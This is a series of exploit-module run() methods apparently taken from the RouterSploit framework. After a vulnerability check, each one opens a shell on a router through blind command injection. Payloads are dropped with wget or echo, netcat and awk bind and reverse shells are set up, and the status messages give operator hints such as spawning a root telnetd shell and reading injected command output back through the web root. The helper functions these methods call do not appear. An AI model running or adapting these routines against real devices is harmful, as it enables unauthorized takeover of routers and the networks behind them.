def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="none", method="awk", binary="awk")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command shell")
shell(self)
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsel", method="wget", binary="wget", location="/var")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command shell")
shell(self)
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("This is blind command injection, response is not available")
shell(self, architecture="mips", binary="netcat", shell="/bin/sh")
else:
print_error("Exploit failed - exploit seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status(
"This is blind command injection, response is not available")
shell(self, architecture="mips", binary="netcat", shell="/bin/sh")
else:
print_error("Exploit failed - exploit seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsle", method="echo", binary="echo", location="/var/tmp/")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>")
shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
def run(self):
if self.check():
print_status("Target might be vulnerable - it is hard to verify")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
print_status(
"It's not possible to check if the target is vulnerable. Try to use following command loop."
)
print_status("Invoking command loop...")
print_status(
"It is blind command injection, response is not available")
shell(self, architecture="mipsle")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsle", method="echo", location="/var/tmp/")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is probably vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'")
shell(self, architecture="arm")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available. Command length up to 28 characters.")
shell(self, architecture="mips")
else:
print_error("Target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable!")
print_status("Invoking command loop...")
shell(self, architecture="mipsle", method="echo", location="/tmp",
echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")
def run(self):
if self.login():
print_success("Target seems to be vulnerable")
self.info()
print_status("Invoking command loop")
shell(self, architecture="mipsbe", method="wget", location="/tmp")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_status("Target might be vulnerable - difficult to verify")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available.")
print_status("Spawn root shell with telnetd -l/bin/sh")
shell(self, architecture="mips")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status(
"It is blind command injection - response is not available")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
def run(self):
if self.login():
print_success("Target seems to be vulnerable")
self.info()
print_status("Invoking command loop")
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
"""
Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target.
"""
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command shell")
print_status("It is blind command injection so response is not available")
# requires testing
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
if self.test_auth():
print_status("Invoking command loop...")
print_status("This is blind command injection. Response is not available.")
shell(self, architecture="mipsel")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is probably vulnerable")
print_status("Invoking command loop...")
print_status(
"It is blind command injection. Try to start telnet with telnet telnetd -p '4445'"
)
shell(self, architecture="arm")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status(
"It is blind command injection - response is not available. Command length up to 28 characters."
)
shell(self, architecture="mips")
else:
print_error("Target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("This is blind command injection, response is not available")
shell(self,
architecture="generic",
method="netcat",
payloads=["netcat_bind_tcp", "netcat_reverse_tcp"])
else:
print_error("Exploit failed - exploit seems to be not vulnerable")
def run(self):
if self.check():
print_status("Target might be vulnerable - difficult to verify")
print_status("Invoking command loop...")
print_status(
"It is blind command injection, response is not available.")
print_status("Spawn root shell with telnetd -l/bin/sh")
shell(self, architecture="mipsbe")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self,
architecture="generic",
method="awk",
payloads=["awk_bind_tcp", "awk_reverse_tcp"])
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success('Target is vulnerable')
print_status('Blind command injection - response is not available')
print_status('Possible extraction point:')
print_status('\t- Inject "CMD > /usr/share/www/routersploit.check"')
print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port))
print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...")
shell(self, architecture="mipsbe")
else:
print_error('Target is not vulnerable')
def run(self):
if self.check():
print_success('Target is vulnerable')
print_status('Blind command injection - response is not available')
print_status('Possible extraction point:')
print_status('\t- Inject "CMD > /usr/share/www/routersploit.check"')
print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port))
print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...")
shell(self, architecture='mips')
else:
print_error('Target is not vulnerable')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status(
"This is blind command injection, response is not available")
shell(self,
architecture="generic",
method="netcat",
payloads=["netcat_bind_tcp", "netcat_reverse_tcp"])
else:
print_error("Exploit failed - exploit seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command shell")
print_status(
"It is blind command injection so response is not available")
# requires testing
shell(self, architecture="mipsbe", method="wget", location="/tmp")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self,
architecture="mipsel",
method="wget",
binary="wget",
location="/var")
else:
print_error("Target is not vulnerable")
def run(self):
try:
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("Please note that only first 256 characters of the output will be displayed or use reverse_tcp")
shell(self, architecture="arm", method="wget", binary="wget", location="/tmp")
else:
print_error("Target is not vulnerable")
except socket.error as ex:
print_error("Socket error ({ex}). It most likely means that something else is listening locally on port UDP:{port}. Make sure to kill it before running the exploit again.".format(ex=ex, port=9999))
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
if self.test_auth():
print_status("Invoking command loop...")
print_status(
"This is blind command injection. Response is not available."
)
shell(self, architecture="mipsel")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>")
if self.arch == "mipsbe":
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp")
elif self.arch == "mipsle":
shell(self, architecture="mipsel", method="wget", binary="wget", location="/tmp")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable!")
print_status("Invoking command loop...")
shell(self,
architecture="mipsle",
method="echo",
location="/tmp",
echo_options={"prefix": "\\\\x"},
exec_binary="chmod 777 {0} && {0} && rm {0}")
else:
print_error("Target is not vulnerable")
def run(self):
try:
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("Please note that only first 256 characters of the "
"output will be displayed or use reverse_tcp")
shell(self, architecture="arm", method="wget", binary="wget", location="/tmp")
else:
print_error("Target is not vulnerable")
except socket.error as ex:
print_error("Socket error ({ex}). It most likely means that something "
"else is listening locally on port UDP:{port}. Make sure to "
"kill it before running the exploit again.".format(ex=ex, port=9999))
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status(
"It is blind command injection - response is not available")
if self.arch == "mipsbe":
shell(self,
architecture="mipsbe",
method="wget",
location="/tmp")
elif self.arch == "mipsle":
shell(self,
architecture="mipsle",
method="wget",
location="/tmp")
else:
print_error("Target is not vulnerable")
def run(self):
print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsle")
def run(self):
print_status("It is not possible to check if target is vulnerable")
print_status("Trying to invoke command loop...")
print_status("It is blind command injection. Response is not available.")
shell(self, architecture="mipsbe")
